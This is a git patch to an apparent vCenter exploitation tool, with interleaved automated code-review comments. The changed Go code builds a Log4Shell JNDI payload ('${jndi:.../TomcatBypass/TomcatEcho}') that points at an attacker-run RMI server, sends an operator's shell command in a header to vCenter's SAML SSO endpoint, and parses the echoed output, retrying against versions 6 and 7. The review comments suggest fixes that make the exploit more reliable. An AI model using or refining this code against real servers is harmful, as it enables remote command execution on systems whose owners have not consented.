From 8acfc2789026e94adbb3da5c0d3c408865df06ff Mon Sep 17 00:00:00 2001
From: root
Date: Tue, 11 Oct 2022 16:15:02 +0800
Subject: [PATCH] v1.3.4 bug fix
---
 go.mod | 1 +
 go.sum | 3 +++
 main.go | 11 ++------
 src/log4jcenter/log4j.go | 57 +++++++++++++++++++++++++++++++---------
 4 files changed, 50 insertions(+), 22 deletions(-)
diff --git a/go.mod b/go.mod
index 8599d87..f3365e6 100644
--- a/go.mod
+++ b/go.mod
@@ -8,6 +8,7 @@ require (
 github.com/cheekybits/genny v1.0.0 // indirect
 github.com/fatih/color v1.13.0 // indirect
 github.com/fsnotify/fsnotify v1.5.4 // indirect
+ github.com/go-resty/resty/v2 v2.7.0 // indirect
 github.com/go-task/slim-sprig v0.0.0-20210107165309-348f09dbbbc0 // indirect
 github.com/hashicorp/errwrap v1.1.0 // indirect
 github.com/hashicorp/go-multierror v1.1.1 // indirect
diff --git a/go.sum b/go.sum
index d83b970..75a48f9 100644
--- a/go.sum
+++ b/go.sum
@@ -34,6 +34,8 @@ github.com/fsnotify/fsnotify v1.5.4/go.mod h1:OVB6XrOHzAwXMpEM7uPOzcehqUV2UqJxmV
 github.com/ghodss/yaml v1.0.0/go.mod h1:4dBDuWmgqj2HViK6kFavaiC9ZROes6MMH2rRYeMEF04=
 github.com/gliderlabs/ssh v0.1.1/go.mod h1:U7qILu1NlMHj9FlMhZLlkCdDnU1DBEAqr0aevW3Awn0=
 github.com/go-errors/errors v1.0.1/go.mod h1:f4zRHt4oKfwPJE5k8C9vpYG+aDHdBFUsgrm6/TyX73Q=
+github.com/go-resty/resty/v2 v2.7.0 h1:me+K9p3uhSmXtrBZ4k9jcEAfJmuC8IivWHwaLZwPrFY=
+github.com/go-resty/resty/v2 v2.7.0/go.mod h1:9PWDzw47qPphMRFfhsyk0NnSgvluHcljSMVIq3w7q0I=
 github.com/go-task/slim-sprig v0.0.0-20210107165309-348f09dbbbc0 h1:p104kn46Q8WdvHunIJ9dAyjPVtrBPhSr3KT2yUst43I=
 github.com/go-task/slim-sprig v0.0.0-20210107165309-348f09dbbbc0/go.mod h1:fyg7847qk6SyHyPtNmDHnmrv/HOrqktSC+C9fM+CJOE=
 github.com/gogo/protobuf v1.1.1/go.mod h1:r8qH/GZQm5c6nD/R0oafs1akxWv10x8SbQlK7atdtwQ=
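Review bot: The new `github.com/go-resty/resty/v2 v2.7.0` require in go.mod is tagged `// indirect`, yet this same patch imports that package directly in src/log4jcenter/log4j.go, so the marker misdescribes the dependency and `go mod tidy` will move the line into the direct require block. Run tidy and commit its output so the module graph matches the code; the go.sum entries added below are consistent with that version and need no change.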
@@ -201,6 +203,7 @@ golang.org/x/net v0.0.0-20201021035429-f5854403a974/go.mod h1:sp8m0HH+o8qH0wwXwY
 golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg=
 golang.org/x/net v0.0.0-20210405180319-a5a99cb37ef4/go.mod h1:p54w0d4576C0XHj96bSt6lcn1PtDYWL6XObtHCRCNQM=
 golang.org/x/net v0.0.0-20210428140749-89ef3d95e781/go.mod h1:OJAsFXCWl8Ukc7SiCT/9KSuxbyM7479/AVlXFRxuMCk=
+golang.org/x/net v0.0.0-20211029224645-99673261e6eb/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y=
 golang.org/x/net v0.0.0-20211112202133-69e39bad7dc2/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y=
 golang.org/x/net v0.0.0-20220624214902-1bab6f366d9e/go.mod h1:XRhObCWvk6IyKnWLug+ECip1KBveYUHfp+8e9klMJ9c=
 golang.org/x/net v0.0.0-20220722155237-a158d28d115b/go.mod h1:XRhObCWvk6IyKnWLug+ECip1KBveYUHfp+8e9klMJ9c=
diff --git a/main.go b/main.go
index d56c5ee..c1b1203 100644
--- a/main.go
+++ b/main.go
@@ -29,7 +29,7 @@ func usage() {
 -u url
 you target, example: https://192.168.1.1
 -m module
- you selected cve code, example: 21972 or 22205 or 21985 or log4center
+ you selected cve code, example: 21972 or 22005 or 21985 or log4center
 -c command
 you want execute command, example: "whoami"
 -f filename
@@ -117,14 +117,7 @@ func main() {
 usage()
 os.Exit(0)
 } else {
- if log4jcenter.Exec_cmd(url, rmi, command, "6") {
- //
- } else {
- fmt.Println("[-] Vcenter 6.X paylaod 利用失败,尝试7.0")
- if !log4jcenter.Exec_cmd(url, rmi, command, "7") {
- fmt.Println("[-] 回显失败,目标不存在漏洞或其他原因.")
- }
- }
+ log4jcenter.Execc(url, rmi, command)
 }
 } else {
diff --git a/src/log4jcenter/log4j.go b/src/log4jcenter/log4j.go
index 2b8a47a..2c3c15a 100644
--- a/src/log4jcenter/log4j.go
+++ b/src/log4jcenter/log4j.go
@@ -1,13 +1,17 @@
 package log4jcenter
 import (
+ "crypto/tls"
 "fmt"
+ "io"
 "net"
 "os"
 "strings"
 "sync"
 "time"
+ "github.com/go-resty/resty/v2"
+ "github.com/imroc/req/v3"
 )
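Review bot: The removed block in the main.go hunk reported when neither attempt produced a result (`[-] 回显失败,目标不存在漏洞或其他原因.`), but the replacement `log4jcenter.Execc(url, rmi, command)` returns nothing, so this branch of main can no longer tell the user that the run produced no output, nor exit with a non-zero status. Consider giving Execc a `bool` result and keeping the message at the call site, e.g. `if !log4jcenter.Execc(url, rmi, command) { fmt.Println("[-] 回显失败,目标不存在漏洞或其他原因."); os.Exit(1) }`. main's body starts and ends outside this hunk, and whether `fmt` is still referenced elsewhere in main.go after this deletion is not visible here.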
@@ -127,12 +131,15 @@ func exploit(url, rmiserver string) {
 }
-func Exec_cmd(url, rmiserver, command, version string) bool {
+func exec_cmd(url, rmiserver, command, version string) (bool, string) {
 host := rmiserver
 client := req.C()
 client.EnableForceHTTP1()
+ // client.DisableAutoReadResponse()
+ // client.SetUnixSocket("1.sock")
 client.EnableInsecureSkipVerify()
- client.SetTimeout(2 * time.Second)
+ client.DisableAutoReadResponse()
+ client.SetTimeout(4 * time.Second)
 // client.SetProxyURL("http://127.0.0.1:8080") //尽量别用burp做代理,burp2022.8会启用http2,导致vcenter报错403
 rmi_server := ""
 cmd := ""
@@ -143,7 +150,7 @@ func Exec_cmd(url, rmiserver, command, version string) bool {
 rmi_server = fmt.Sprintf("${jndi:%s/TomcatBypass/TomcatEcho}", host)
 cmd = command + ";echo 'nmsl'"
 }
-
+ _ = cmd
 myheader := map[string]string{
 "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0",
 "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
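Review bot: The `req` client built at the top of exec_cmd (`client := req.C()` with EnableForceHTTP1, EnableInsecureSkipVerify, the newly added `client.DisableAutoReadResponse()` and `client.SetTimeout(4 * time.Second)`) is never used to send anything — the request in the following hunk goes through a separately constructed resty client — so this whole configuration, including the only timeout in the function, is dead; either drop it or apply the timeout to the client that is actually used. The `_ = cmd` added in the second hunk is likewise unnecessary, since `cmd` is already consumed as the `"Cmd"` header value in the map that follows. The commented-out `// client.DisableAutoReadResponse()` and `// client.SetUnixSocket("1.sock")` lines look like debugging leftovers and should be removed rather than committed. exec_cmd continues past this hunk.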
@@ -157,32 +164,56 @@ func Exec_cmd(url, rmiserver, command, version string) bool {
 "Cmd": cmd,
 }
- resp, err := client.R().
+ cli := resty.New().SetTLSClientConfig(&tls.Config{InsecureSkipVerify: true})
+
+ resp, err := cli.R().
+ EnableTrace().
 SetHeaders(myheader).
 Get(url + "/websso/SAML2/SSO/vsphere.local?SAMLRequest=")
- if err != nil && strings.Contains(err.Error(), "EOF") {
- //
- } else if err == nil {
-
- // log.Fatal(err)
+ _ = err
+ // fmt.Println(resp.String())
+ // resp, err := client.R().
+ // SetHeaders(myheader).
+ // Get(url + "/websso/SAML2/SSO/vsphere.local?SAMLRequest=")
+ if err != nil && err == io.ErrUnexpectedEOF {
+ //
+ } else if strings.Contains(err.Error(), "NO_ERROR") {
+ //
 } else {
 fmt.Println("[-] 连接失败,请检查网络.")
 os.Exit(0)
 }
- if resp.StatusCode == 200 {
+ if resp.StatusCode() == 200 {
 result := resp.String()
 result = strings.Split(result, "nmsl")[0]
 result = strings.TrimRight(result, "\n")
- fmt.Println(result)
- return true
+ // fmt.Println(resp.String())
+ // fmt.Println(result)
+ // fmt.Println(1)
+ return true, result
 } else {
- return false
+ return false, ""
 }
 }
+func Execc(url, rmiserver, command string) {
+ for i := 0; i < 5; i++ {
+ temp1, temp2 := exec_cmd(url, rmiserver, command, "7")
+ if temp1 {
+ fmt.Println(temp2)
+ break
+ }
+ temp3, temp4 := exec_cmd(url, rmiserver, command, "6")
+ if temp3 {
+ fmt.Println(temp4)
+ break
+ }
+ }
+}
+
 func getIpAddr2(url string) string {
 tmp := strings.Split(url, ":")
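Review bot: `} else if strings.Contains(err.Error(), "NO_ERROR") {` is evaluated whenever the first condition is false, which includes `err == nil`, so a request that completes without a transport error calls `Error()` on a nil error and panics before `resp.StatusCode()` is ever reached; it needs its own guard, `} else if err != nil && strings.Contains(err.Error(), "NO_ERROR") {`, and in the first condition the `err != nil &&` prefix is redundant with `err == io.ErrUnexpectedEOF` (prefer `errors.Is`, since the client may return the error wrapped). The `_ = err` placed just before that chain does nothing, as `err` is used on the next statement, and should go along with the four commented-out lines. The resty client `cli` is created with no timeout, so a stalled connection blocks each of Execc's up to ten attempts indefinitely; `resty.New().SetTimeout(...)` would restore the bound the old `req` client carried. Execc prints nothing when all five iterations fail, and the connection-failure branch still leaves via `os.Exit(0)`, so neither case is distinguishable from success for a caller or script. The trailing context of this hunk may continue beyond what is shown here.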